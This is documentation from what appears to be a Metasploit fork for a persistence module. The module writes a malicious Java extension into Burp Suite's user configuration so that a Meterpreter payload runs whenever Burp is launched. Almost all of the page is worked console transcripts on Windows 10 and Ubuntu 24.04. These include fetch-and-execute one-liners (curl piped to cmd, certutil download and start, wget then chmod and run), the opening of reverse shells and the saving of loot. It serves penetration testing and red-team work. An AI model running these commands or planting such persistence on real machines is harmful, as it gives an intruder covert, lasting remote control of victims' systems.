adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f632cf34bfef55fc2f602f620cda2aa70fb74c8d
metasploit-gs/documentation/modules/exploit/multi/persistence/burp_extension.md
T
h00die 7ccf574e99 burp extension all working
2026-01-16 08:44:27 -05:00

520 lines
20 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module adds a java based malicious extension to the Burp Suite configuration file.
When burp is opened, the extension will be loaded and the payload will be executed.
Tested against Burp Suite Community Edition v2024.9.4, on Ubuntu Desktop 24.04.
Tested against Burp Suite Community Edition v2025.12.3 on Windows 10.
## Verification Steps
1. Install burp
2. Start msfconsole
3. Get an initial shell on *nix or Windows
4. Do: `use exploit/multi/local/burp_extension_persistence`
5. Do: `set session #`
6. Do: `set writabledir <directory>`
7. Do: `run`
8. Once the extension is installed, and burp started, you should get a shell
## Options
### NAME
Name of the extension. If blank, a random name is closen.
### CONFIG
Config file location on target. This is a User Settings file that an extension can be added to.
### WritableDir
A directory where we can write the extension
### USER
User to target, or current user if blank
### GRADLE
If action is set to build, the local location of the gradle executable to build the extension with.
Defaults to `/usr/bin/gradle`
## Action
### precompiled
Use pre-compiled bytecode, Gradle is not required
### build
Build the extension locally with Gradle.
## Scenarios
### Burp 2025.12.3 on Windows 10, precompiled with Windows target
Initial Access
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Client 2.2.2.2 requested /VIFzePGTMLa1dcpTvMRQBg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55729) at 2026-01-16 05:24:25 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```
Install Persistence
```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set target 2
target => 2
msf exploit(multi/persistence/burp_extension) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9812
lport => 9812
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/v3fXAwPgMBDCL44G1aW0KQ %TEMP%\CYdTYFAds.exe & start /B %TEMP%\CYdTYFAds.exe
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/burp_extension) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /v3fXAwPgMBDCL44G1aW0KQ
[*] Started reverse TCP handler on 1.1.1.1:9812
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: BuIwiN
[*] Creating JAR file
[*] Writing malicious extension to disk: c:\users\windows\desktop\BuIwiN.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116054809_default_2.2.2.2_burp.config.json_765439.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.4809/WIN10PROLICENSE_20260116.4809.rc
```
Launch Burp
```
[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9812 -> 2.2.2.2:55876) at 2026-01-16 05:49:34 -0500
```
### Burp 2025.12.3 on Windows 10, build with Java target
Initial Access
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55900) at 2026-01-16 05:53:50 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```
Install Persistence
```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9815
lport => 9815
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/burp_extension) >
[*] Started reverse TCP handler on 1.1.1.1:9815
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: IoWH
[*] Creating JAR file
[*] Building Burp extension jar file locally in /tmp/d20260116-127808-hkcygo
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
Starting a Gradle Daemon (subsequent builds will be faster)
:clean UP-TO-DATE
:compileJava
:processResources
:classes
:jar
:assemble
:compileTestJava NO-SOURCE
:processTestResources NO-SOURCE
:testClasses UP-TO-DATE
:test NO-SOURCE
:check UP-TO-DATE
:build
BUILD SUCCESSFUL in 7s
4 actionable tasks: 3 executed, 1 up-to-date
[+] Successfully built the jar file /tmp/d20260116-127808-hkcygo/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: c:\users\windows\desktop\IoWH.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116060148_default_2.2.2.2_burp.config.json_518370.bin
```
Launch Burp
```
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.0148/WIN10PROLICENSE_20260116.0148.rc
[*] Sending stage (58073 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9815 -> 2.2.2.2:56020) at 2026-01-16 06:14:57 -0500
```
### Burp 2025.12.3 on Ubuntu 24.04, precompiled with Linux target
Initial Access
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO wThmilCQ --no-check-certificate http://1.1.1.1:8082/l; chmod +x wThmilCQ; ./wThmilCQ& disown
msf exploit(multi/script/web_delivery) >
[*] 3.3.3.3 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:43276) at 2026-01-16 06:31:49 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer : 3.3.3.3
OS : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
```
Install Persistence
```
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set target 1
target => 1
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9816
lport => 9816
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:9816
msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: KdqJR
[*] Creating JAR file
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//KdqJR.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116073105_default_3.3.3.3_burp.config.json_225090.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.3105/3.3.3.3_20260116.3105.rc
```
Launch Burp
```
[*] Sending stage (23404 bytes) to 3.3.3.3
[*] Meterpreter session 2 opened (1.1.1.1:9816 -> 3.3.3.3:59798) at 2026-01-16 07:45:08 -0500
msf exploit(multi/persistence/burp_extension) >
```
### Burp 2025.12.3 on Ubuntu 24.04, build with Java target
Initial Access
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO z9hg2BUt --no-check-certificate http://1.1.1.1:8082/l; chmod +x z9hg2BUt; ./z9hg2BUt& disown
msf exploit(multi/script/web_delivery) >
[*] 3.3.3.3 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:59534) at 2026-01-16 07:54:07 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer : 3.3.3.3
OS : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
```
Install Persistence
```
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9817
lport => 9817
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:9817
msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: YBFkQz
[*] Creating JAR file
[*] Building Burp extension jar file locally in /tmp/d20260116-130356-yxz2cv
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
:clean UP-TO-DATE
:compileJava
:processResources
:classes
:jar
:assemble
:compileTestJava NO-SOURCE
:processTestResources NO-SOURCE
:testClasses UP-TO-DATE
:test NO-SOURCE
:check UP-TO-DATE
:build
BUILD SUCCESSFUL in 1s
4 actionable tasks: 3 executed, 1 up-to-date
[+] Successfully built the jar file /tmp/d20260116-130356-yxz2cv/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//YBFkQz.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116075456_default_3.3.3.3_burp.config.json_053290.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.5456/3.3.3.3_20260116.5456.rc
```
Launch Burp
```
[*] Sending stage (58073 bytes) to 3.3.3.3
[*] Meterpreter session 2 opened (1.1.1.1:9817 -> 3.3.3.3:52712) at 2026-01-16 07:55:28 -0500
```
Reference in New Issue View Git Blame Copy Permalink